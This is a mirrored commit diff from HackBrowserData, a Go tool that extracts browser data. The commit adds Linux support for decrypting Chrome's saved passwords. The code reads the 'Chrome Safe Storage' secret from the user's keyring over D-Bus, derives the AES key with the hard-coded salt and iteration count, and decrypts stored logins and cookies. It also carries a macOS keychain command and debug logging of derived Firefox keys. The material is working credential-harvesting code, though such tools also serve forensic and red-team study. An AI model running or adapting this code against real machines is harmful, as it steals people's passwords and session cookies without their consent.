mirror of
https://github.com/moonD4rk/HackBrowserData.git
synced 2026-05-19 18:58:03 +02:00
decrypt chrome for linux password with dbus Close #4
This commit is contained in:
ᴍᴏᴏɴD4ʀᴋ
@@ -59,6 +59,7 @@ const (
|
||||
var (
|
||||
ErrDataNotSupported = errors.New(`not supported, default is "all", choose from history|password|bookmark|cookie`)
|
||||
ErrBrowserNotSupported = errors.New("browser not supported")
|
||||
ErrChromeSecretIsEmpty = errors.New("chrome secret is empty")
|
||||
chromiumParseList = map[string]FileList{
|
||||
cookie: {
|
||||
name: cookie,
|
||||
|
||||
@@ -60,10 +60,13 @@ func (c *chromium) InitSecretKey() error {
|
||||
log.Error(err)
|
||||
}
|
||||
temp := stdout.Bytes()
|
||||
chromePass := temp[:len(temp)-1]
|
||||
chromeSecret := temp[:len(temp)-1]
|
||||
if chromeSecret == nil {
|
||||
return ErrChromeSecretIsEmpty
|
||||
}
|
||||
var chromeSalt = []byte("saltysalt")
|
||||
// @https://source.chromium.org/chromium/chromium/src/+/master:components/os_crypt/os_crypt_mac.mm;l=157
|
||||
key := pbkdf2.Key(chromePass, chromeSalt, 1003, 16, sha1.New)
|
||||
key := pbkdf2.Key(chromeSecret, chromeSalt, 1003, 16, sha1.New)
|
||||
c.SecretKey = key
|
||||
return err
|
||||
}
|
||||
|
||||
+54
-23
@@ -1,18 +1,17 @@
|
||||
package core
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"crypto/sha1"
|
||||
"errors"
|
||||
"github.com/godbus/dbus/v5"
|
||||
keyring "github.com/ppacher/go-dbus-keyring"
|
||||
"hack-browser-data/log"
|
||||
"os/exec"
|
||||
|
||||
"golang.org/x/crypto/pbkdf2"
|
||||
)
|
||||
|
||||
const (
|
||||
fireFoxProfilePath = "/home/*/.mozilla/firefox/*.default-release/"
|
||||
fireFoxCommand = ""
|
||||
chromeProfilePath = "/home/*/.config/google-chrome/*/"
|
||||
)
|
||||
|
||||
var (
|
||||
@@ -24,35 +23,67 @@ var (
|
||||
}{
|
||||
"firefox": {
|
||||
ProfilePath: fireFoxProfilePath,
|
||||
Name: fireFoxCommand,
|
||||
Name: firefoxName,
|
||||
New: decryptFirefox,
|
||||
},
|
||||
"chrome": {
|
||||
ProfilePath: chromeProfilePath,
|
||||
Name: chromeName,
|
||||
New: decryptChromium,
|
||||
},
|
||||
}
|
||||
)
|
||||
|
||||
func (c *chromium) InitSecretKey() error {
|
||||
var (
|
||||
cmd *exec.Cmd
|
||||
stdout, stderr bytes.Buffer
|
||||
)
|
||||
//➜ security find-generic-password -wa 'Chrome'
|
||||
cmd = exec.Command("security", "find-generic-password", "-wa", c.Name)
|
||||
cmd.Stdout = &stdout
|
||||
cmd.Stderr = &stderr
|
||||
err := cmd.Run()
|
||||
//what is d-bus @https://dbus.freedesktop.org/
|
||||
var chromeSecret []byte
|
||||
conn, err := dbus.SessionBus()
|
||||
if err != nil {
|
||||
log.Error(err)
|
||||
return err
|
||||
}
|
||||
if stderr.Len() > 0 {
|
||||
err = errors.New(stderr.String())
|
||||
log.Error(err)
|
||||
svc, err := keyring.GetSecretService(conn)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
session, err := svc.OpenSession()
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
defer func() {
|
||||
if err = session.Close(); err != nil {
|
||||
log.Error(err)
|
||||
}
|
||||
}()
|
||||
collections, err := svc.GetAllCollections()
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
for _, col := range collections {
|
||||
items, err := col.GetAllItems()
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
for _, item := range items {
|
||||
i, err := item.GetLabel()
|
||||
if err != nil {
|
||||
log.Error(err)
|
||||
continue
|
||||
}
|
||||
if i == "Chrome Safe Storage" {
|
||||
se, err := item.GetSecret(session.Path())
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
chromeSecret = se.Value
|
||||
}
|
||||
}
|
||||
}
|
||||
temp := stdout.Bytes()
|
||||
chromePass := temp[:len(temp)-1]
|
||||
var chromeSalt = []byte("saltysalt")
|
||||
// @https://source.chromium.org/chromium/chromium/src/+/master:components/os_crypt/os_crypt_mac.mm;l=157
|
||||
key := pbkdf2.Key(chromePass, chromeSalt, 1003, 16, sha1.New)
|
||||
if chromeSecret == nil {
|
||||
return ErrChromeSecretIsEmpty
|
||||
}
|
||||
// @https://source.chromium.org/chromium/chromium/src/+/master:components/os_crypt/os_crypt_linux.cc
|
||||
key := pbkdf2.Key(chromeSecret, chromeSalt, 1, 16, sha1.New)
|
||||
c.SecretKey = key
|
||||
return err
|
||||
return nil
|
||||
}
|
||||
|
||||
+2
-15
@@ -136,7 +136,6 @@ func (l *Logins) ChromeParse(key []byte) error {
|
||||
log.Debug(err)
|
||||
}
|
||||
}()
|
||||
err = loginDB.Ping()
|
||||
rows, err := loginDB.Query(queryChromiumLogin)
|
||||
defer func() {
|
||||
if err := rows.Close(); err != nil {
|
||||
@@ -206,7 +205,6 @@ func (h *History) ChromeParse(key []byte) error {
|
||||
log.Error(err)
|
||||
}
|
||||
}()
|
||||
err = historyDB.Ping()
|
||||
rows, err := historyDB.Query(queryChromiumHistory)
|
||||
defer func() {
|
||||
if err := rows.Close(); err != nil {
|
||||
@@ -247,7 +245,6 @@ func (c *Cookies) ChromeParse(secretKey []byte) error {
|
||||
log.Debug(err)
|
||||
}
|
||||
}()
|
||||
err = cookieDB.Ping()
|
||||
rows, err := cookieDB.Query(queryChromiumCookie)
|
||||
defer func() {
|
||||
if err := rows.Close(); err != nil {
|
||||
@@ -282,11 +279,7 @@ func (c *Cookies) ChromeParse(secretKey []byte) error {
|
||||
}
|
||||
|
||||
cookie.Value = string(value)
|
||||
if _, ok := c.cookies[host]; ok {
|
||||
c.cookies[host] = append(c.cookies[host], cookie)
|
||||
} else {
|
||||
c.cookies[host] = []cookies{cookie}
|
||||
}
|
||||
c.cookies[host] = append(c.cookies[host], cookie)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
@@ -412,7 +405,6 @@ func (c *Cookies) FirefoxParse() error {
|
||||
log.Debug(err)
|
||||
}
|
||||
}()
|
||||
err = cookieDB.Ping()
|
||||
rows, err := cookieDB.Query(queryFirefoxCookie)
|
||||
if err != nil {
|
||||
log.Error(err)
|
||||
@@ -441,11 +433,7 @@ func (c *Cookies) FirefoxParse() error {
|
||||
}
|
||||
|
||||
cookie.Value = value
|
||||
if _, ok := c.cookies[host]; ok {
|
||||
c.cookies[host] = append(c.cookies[host], cookie)
|
||||
} else {
|
||||
c.cookies[host] = []cookies{cookie}
|
||||
}
|
||||
c.cookies[host] = append(c.cookies[host], cookie)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
@@ -533,7 +521,6 @@ func getDecryptKey() (item1, item2, a11, a102 []byte, err error) {
|
||||
}
|
||||
}()
|
||||
|
||||
err = keyDB.Ping()
|
||||
pwdRows, err = keyDB.Query(queryMetaData)
|
||||
defer func() {
|
||||
if err := pwdRows.Close(); err != nil {
|
||||
|
||||
@@ -10,9 +10,10 @@ import (
|
||||
)
|
||||
|
||||
var (
|
||||
errKeyIsEmpty = errors.New("input [security find-generic-password -wa 'Chrome'] in terminal")
|
||||
errPasswordIsEmpty = errors.New("password is empty")
|
||||
errDecryptFailed = errors.New("decrypt failed, password is empty")
|
||||
errSecurityKeyIsEmpty = errors.New("input [security find-generic-password -wa 'Chrome'] in terminal")
|
||||
errPasswordIsEmpty = errors.New("password is empty")
|
||||
errDecryptFailed = errors.New("decrypt failed, password is empty")
|
||||
errDbusSecretIsEmpty = errors.New("dbus secret key is empty")
|
||||
)
|
||||
|
||||
func aes128CBCDecrypt(key, iv, encryptPass []byte) ([]byte, error) {
|
||||
|
||||
@@ -14,7 +14,7 @@ var (
|
||||
func ChromePass(key, encryptPass []byte) ([]byte, error) {
|
||||
if len(encryptPass) > 3 {
|
||||
if len(key) == 0 {
|
||||
return nil, errKeyIsEmpty
|
||||
return nil, errSecurityKeyIsEmpty
|
||||
}
|
||||
m, err := aes128CBCDecrypt(key, chromeIV, encryptPass[3:])
|
||||
return m, err
|
||||
|
||||
@@ -18,7 +18,7 @@ var (
|
||||
func ChromePass(key, encryptPass []byte) ([]byte, error) {
|
||||
if len(encryptPass) > 3 {
|
||||
if len(key) == 0 {
|
||||
return nil, errKeyIsEmpty
|
||||
return nil, errSecurityKeyIsEmpty
|
||||
}
|
||||
m, err := aes128CBCDecrypt(key, chromeIV, encryptPass[3:])
|
||||
return m, err
|
||||
@@ -151,18 +151,18 @@ func decryptMeta(globalSalt, masterPwd, entrySalt, encrypted []byte) ([]byte, er
|
||||
|
||||
func decryptNss(globalSalt, masterPwd, nssIv, entrySalt, encrypted []byte, iter, keySize int) ([]byte, error) {
|
||||
k := sha1.Sum(globalSalt)
|
||||
log.Println(hex.EncodeToString(k[:]))
|
||||
log.Debug(hex.EncodeToString(k[:]))
|
||||
key := pbkdf2.Key(k[:], entrySalt, iter, keySize, sha256.New)
|
||||
log.Println(hex.EncodeToString(key))
|
||||
log.Debug(hex.EncodeToString(key))
|
||||
i, err := hex.DecodeString("040e")
|
||||
if err != nil {
|
||||
log.Println(err)
|
||||
log.Debug(err)
|
||||
}
|
||||
// @https://hg.mozilla.org/projects/nss/rev/fc636973ad06392d11597620b602779b4af312f6#l6.49
|
||||
iv := append(i, nssIv...)
|
||||
dst, err := aes128CBCDecrypt(key, iv, encrypted)
|
||||
if err != nil {
|
||||
log.Println(err)
|
||||
log.Debug(err)
|
||||
}
|
||||
return dst, err
|
||||
}
|
||||
|
||||
@@ -158,18 +158,18 @@ func Nss(globalSalt, masterPwd []byte, pbe NssPBE) ([]byte, error) {
|
||||
|
||||
func decryptMeta(globalSalt, masterPwd, nssIv, entrySalt, encrypted []byte, iter, keySize int) ([]byte, error) {
|
||||
k := sha1.Sum(globalSalt)
|
||||
log.Println(hex.EncodeToString(k[:]))
|
||||
log.Debug(hex.EncodeToString(k[:]))
|
||||
key := pbkdf2.Key(k[:], entrySalt, iter, keySize, sha256.New)
|
||||
log.Println(hex.EncodeToString(key))
|
||||
log.Debug(hex.EncodeToString(key))
|
||||
i, err := hex.DecodeString("040e")
|
||||
if err != nil {
|
||||
log.Println(err)
|
||||
log.Debug(err)
|
||||
}
|
||||
// @https://hg.mozilla.org/projects/nss/rev/fc636973ad06392d11597620b602779b4af312f6#l6.49
|
||||
iv := append(i, nssIv...)
|
||||
dst, err := aes128CBCDecrypt(key, iv, encrypted)
|
||||
if err != nil {
|
||||
log.Println(err)
|
||||
log.Debug(err)
|
||||
}
|
||||
return dst, err
|
||||
}
|
||||
|
||||
Reference in New Issue
Block a user